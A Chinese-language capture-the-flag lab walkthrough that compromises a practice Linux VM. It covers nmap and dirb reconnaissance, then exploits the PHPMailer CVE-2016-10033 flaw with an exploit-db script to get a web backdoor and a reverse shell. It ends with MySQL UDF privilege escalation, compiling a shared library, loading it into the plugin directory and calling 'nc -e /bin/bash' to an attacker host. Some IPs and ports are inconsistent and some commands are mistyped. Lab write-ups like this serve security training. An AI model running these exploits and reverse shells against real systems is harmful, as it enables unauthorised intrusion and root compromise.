udf提权

环境：

kali:192.168.157.128

linux靶机：192.168.157.130

1.使用nmap对当前网段进行扫描

nmap 192.168.157.0/24

发现靶机IP和开放端口

2.对靶机进行详细的服务探测

• -sS：使用 SYN 扫描（半开放扫描）方式，向目标主机发送 SYN 请求进行端口扫描。
• -sV：对开放的端口进行版本探测，尝试获取正在运行的服务的版本信息。
• -T4：设置扫描速度为快速模式。
• -A：启用一系列的侦测功能，包括操作系统探测、脚本扫描等。

  nmap -sS -sV -T4 -A 192.168.157.130

  

  3.使用dirb对80端口对应的网站进行目录爆

  dirb http://192.168.157.130

  

  

  在http:192.168.157.130/vendor/PATH这个路径发现第一个flag

  

  在http:192.168.157.130/vendor/README.md这个文件中发现使用的插件是PHPMailer

  

  在http:192.168.157.130/vendor/SECURITY.md发现了PHPMailer的历史漏洞

  

  翻译http:192.168.157.130/vendor/SECURITY.md页面的内容如下：

  关于 PHPMailer 的安全通知：

  请负责任地通报发现的任何漏洞，将发现的任何安全问题私下报告给维护人员。

  PHPMailer 版本 5.2.18 之前（于 2016 年 12 月发布）存在漏洞 CVE-2016-10033 ，是一种远程代码执行漏洞，由 Dawid Golunski 负责报告。

  PHPMailer 版本 5.2.14 之前（于 2015 年 11 月发布）存在漏洞 CVE-2015-8476 ，是一种 SMTP CRLF 注入漏洞，允许任意消息发送。

  PHPMailer 版本 5.2.10 之前（于 2015 年 5 月发布）存在漏洞 CVE-2008-5619 ，是一个远程代码执行漏洞，存在于捆绑的 html2text 库中。这个文件已在 5.2.10 中删除，因此如果您使用的版本早于此版本并且使用 html2text 函数，则非常重要的升级并删除此文件。

  PHPMailer 版本 2.0.7 和 2.2.1 之前存在漏洞 CVE-2012-0796，是一种电子邮件头注入攻击。

  Joomla 1.6.0 不安全地使用 PHPMailer，允许揭示本地文件路径，报告于 CVE-2011-3747。

  PHPMailer 未对 SetLanguage 中的 $lang_path 参数进行清理。这本身不是问题，但某些应用程序（如 PHPClassifieds、ATutor）也未能清理传递给它的用户提供的参数，允许半任意本地文件包含，报告于 CVE-2010-4914 、 CVE-2007-2021 和 CVE-2006-5734。

  PHPMailer 1.7.2 及更早版本存在可能的 DDoS 漏洞，报告于 CVE-2005-1807。

  PHPMailer 1.7 及更早版本（2003 年 6 月）在 SendmailSend 方法中存在可能的漏洞，其中 shell 命令可能无法进行清理。报告于 CVE-2007-3215。

  在http:192.168.157.130/vendor/VERSION发现了PHPMailer当前的版本，正好是5.2.16，符合CVE-2016-10033，直接找exp

  

  4.40947文件

  searchsploit 40974

  

  cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/桌面/3  复制到桌面的文件夹

  

  vi 40974.py   #编辑文件

  

  41行：修改成目标地址

  42行：生成的后门文件名称

  44行：修改反弹的ip及端口

  47行：网站的根目

  python 40974.py   #运行Python文件

  

  5.监听本地8888端口

  监听之前将kali默认的shell切换为bash

  bash

  nc -lvnp 8888

  同时访问http:192.168.157.130/contact.php，在接着访问http:192.168.157.130/test.ph

  p。因为我们想访问contact.php，才会生成test.php的后门。

  

  

  

  使用技巧切换为稳定的shell，依次执行一下代码

  python -c 'import pty; pty.spawn("/bin/bash")'

  CTRL+z

  stty raw -echofg

  

  6.寻找剩下的flag

  find -name flag*

  MYSQL-UDF提权

  1.查看MySQL进程信息，是root权限运行

  ps aux | grep mysql

  

  2.查看在wordpress目录下的wp-config.php文件看mysql的账号及密码

  

  3.查看mysql是否有版本及是否有写入权限及插件目录

  mysql -uroot -pR@v3nSecurity 登录mysql

  select version();

  show global variables like 'secure%'; #首先看一下是否满足写入条件

  show variables like 'plugin%';或select @@plugin_dir; #查看插件目

  

  

  4.将文件1518.c从kali中复制出来，进行本机编译

  cp /usr/share/exploitdb/exploits/linux/local/1518.c /home/kali/Desktop

  gcc -g -c 1518.c

  gcc -g -shared -o udf.so 1518.o -lc

  python -m http.server   # 开启服务

  

  

  wget http:192.168.86.128:8000/udf.so

  

  mysql -uroot -pR@v3nSecurity

  use mysql;

  create table foo(line blob); #进入数据库创建数据表

  insert into foo values(load_file('/tmp/udf.so')); #插入数据文件

  select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so';     #成功插入二进制数据，然后利用dumpfile函数把文件导出，outfile 多行导出，dumpfile一行导出，outfile会有特殊的转换，而dumpfile是原数据导出！

  create function do_system returns integer soname 'udf.so';      #创建自定义函数

  do_system，类型是integer，别名（soname）文件名字，然后查询函数是否创建成功：

  select * from mysql.func;    #查看以下创建的函数

  本地监听nc -lvnp 4455

  mysql中执行：select do_system('nc -nv 192.168.168.128 6666 -e /bin/bash')